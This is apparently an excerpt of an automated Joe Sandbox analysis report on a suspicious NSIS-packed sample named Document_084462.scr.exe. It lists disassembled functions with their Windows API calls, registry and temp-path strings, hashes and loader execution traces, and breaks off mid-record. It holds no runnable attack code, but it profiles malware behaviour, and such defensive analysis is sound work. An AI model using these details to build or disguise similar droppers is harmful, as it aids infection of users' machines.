                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                                                              • Instruction ID: 189cbaabe8764c773f58747126bd63a1e8498669fac95269da527f62f649557f
                                                                              • Opcode Fuzzy Hash: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                                                              • Instruction Fuzzy Hash: EE21AD7195420AAEEF05AFB4DD4AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                                              • wsprintfW.USER32 ref: 00404C9B
                                                                              • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s
                                                                              • API String ID: 3540041739-3551169577
                                                                              • Opcode ID: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                                                              • Instruction ID: 3d6b25ca05220dcf043cb3c1ab85a77e0c97cb6522f385c7b59333deb0f41e84
                                                                              • Opcode Fuzzy Hash: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                                                              • Instruction Fuzzy Hash: 4811EB736041283BEB00A5AD9D45EDE3688DBC5334F254637FA26F31D1E978C81182E8
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024CD
                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040250D
                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValuelstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp
                                                                              • API String ID: 2655323295-2333618704
                                                                              • Opcode ID: 8ad9f413285597f4ac34c444e8e090e563bd286de5b8d8eab0abce92a9a2370d
                                                                              • Instruction ID: b5ab21fa5db9dca98c90a3684f9c4c1c94415ceb852b3cd4d8f68548cc0c41e7
                                                                              • Opcode Fuzzy Hash: 8ad9f413285597f4ac34c444e8e090e563bd286de5b8d8eab0abce92a9a2370d
                                                                              • Instruction Fuzzy Hash: D311AF71E00108BEEB00AFA5CE49AAE7BB9EF44314F20443AF514B71D1D6B88D409668
                                                                              APIs
                                                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp
                                                                              • API String ID: 3248276644-2962327952
                                                                              • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                                                              • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                                                              • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                                                              • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE
                                                                              APIs
                                                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                              • CharNextW.USER32(00000000), ref: 00405D81
                                                                              • CharNextW.USER32(00000000), ref: 00405D99
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp, xrefs: 00405D6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp
                                                                              • API String ID: 3213498283-2333618704
                                                                              • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                              • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                                                              • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                              • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-3355392842
                                                                              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                              • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                                                              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                              • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll), ref: 0040268D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp$C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll
                                                                              • API String ID: 1659193697-3208637225
                                                                              • Opcode ID: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                                                              • Instruction ID: b6edfc9972aa644188961ebceaa73704b58c28032334693464610e5b401fed5f
                                                                              • Opcode Fuzzy Hash: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                                                              • Instruction Fuzzy Hash: CF110D71A10305AACB00ABB08F4AAAE77719F55748F61443FF502F61C1D6FC4951565E
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000,00000000,0040318F,?,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                              • GetTickCount.KERNEL32 ref: 00402FE2
                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                              • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                                                              • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                                                              • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                                                              • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 004053F9
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040544A
                                                                                • Part of subcall function 00404390: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                                                              • Instruction ID: 5f6fd1bc1cb6019f344e496d8f57972e5ce8a9055d244d91c322c77d39ebf2aa
                                                                              • Opcode Fuzzy Hash: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                                                              • Instruction Fuzzy Hash: 63018431101608AFEF205F11DD80BDB3725EB95355F508037FA00762E1C77A8C919A6D
                                                                              APIs
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                                                              • RegCloseKey.ADVAPI32(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID: Call
                                                                              • API String ID: 3356406503-1824292864
                                                                              • Opcode ID: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                                                              • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                                                              • Opcode Fuzzy Hash: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                                                              • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                                                              • CloseHandle.KERNEL32(?), ref: 00405A0D
                                                                              Strings
                                                                              • Error launching installer, xrefs: 004059EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                                                              • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                                                              • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                                                              • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,77043420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                                                              • GlobalFree.KERNEL32(0088F228), ref: 00403A49
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-3355392842
                                                                              • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                              • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                                                              • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                              • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Document_084462.scr.exe,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Document_084462.scr.exe,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\Desktop
                                                                              • API String ID: 2709904686-3370423016
                                                                              • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                              • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                                                              • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                              • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 700B116A
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B11C7
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B11D9
                                                                              • GlobalFree.KERNEL32(?), ref: 700B1203
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloc
                                                                              • String ID:
                                                                              • API String ID: 1780285237-0
                                                                              • Opcode ID: 8e80c048a8d016a07de65bb820536015e8c4eb64df5e2547e074793ed4c62cb3
                                                                              • Instruction ID: 6181a27cb5a2c472851054649477454818387909b75a64b3dd1207986d306970
                                                                              • Opcode Fuzzy Hash: 8e80c048a8d016a07de65bb820536015e8c4eb64df5e2547e074793ed4c62cb3
                                                                              • Instruction Fuzzy Hash: 6331B2B2400101DFE3119F69DC45BED77FAEB44B31BA00A69EA41D6324E738ED0187A0
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                                                              • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E82
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                              • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                                                              • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                              • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

                                                                              Execution Graph

                                                                              Execution Coverage:0%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:100%
                                                                              Total number of Nodes:1
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 80977 37af2b90 LdrInitializeThunk

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4 37af34e0-37af34ec LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: bb8dea46daac074bc16b4f8b4685e77dabdf5cc3451c0467a426d34e08fddb1c
                                                                              • Instruction ID: 89c1f0b262d2a486cd9c73c7212cc8ac37a5d3551f97768d23e61681b9b9f560
                                                                              • Opcode Fuzzy Hash: bb8dea46daac074bc16b4f8b4685e77dabdf5cc3451c0467a426d34e08fddb1c
                                                                              • Instruction Fuzzy Hash: 1F90027160560412E50061584628706141547D0301F61C816A0414568ED7A58B5579A2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3 37af2eb0-37af2ebc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 35fb4b3fe0164edfea4f42c35612e5dd2e0f0ced4b7556cb7bd03bd3cae05dfe
                                                                              • Instruction ID: 7badf5e0cfa8d82f134024459af6699cd41978279779653d3feefe0488e89d77
                                                                              • Opcode Fuzzy Hash: 35fb4b3fe0164edfea4f42c35612e5dd2e0f0ced4b7556cb7bd03bd3cae05dfe
                                                                              • Instruction Fuzzy Hash: 9890027120190412E5006158492870B041547D0302F51C416A1154555ED7358A557971

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2 37af2d10-37af2d1c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 37af2b90-37af2b9c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1 37af2bc0-37af2bcc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2160512332

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $ $0
                                                                              • API String ID: 3446177414-3352262554
                                                                              Strings
                                                                              • PreferredUILanguagesPending, xrefs: 37B55D52
                                                                              • LanguageConfiguration, xrefs: 37B55FA0
                                                                              • @, xrefs: 37B55DF7
                                                                              • @, xrefs: 37B55FFA
                                                                              • PreferredUILanguages, xrefs: 37B55F51
                                                                              • @, xrefs: 37B55F20
                                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 37B55604
                                                                              • Control Panel\Desktop, xrefs: 37B55CDE
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 37B55EDD
                                                                              • @, xrefs: 37B55D30
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 37B55B61
                                                                              • LanguageConfigurationPending, xrefs: 37B55DA1
                                                                              • InstallLanguageFallback, xrefs: 37B55BD0
                                                                              • @, xrefs: 37B55BA7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
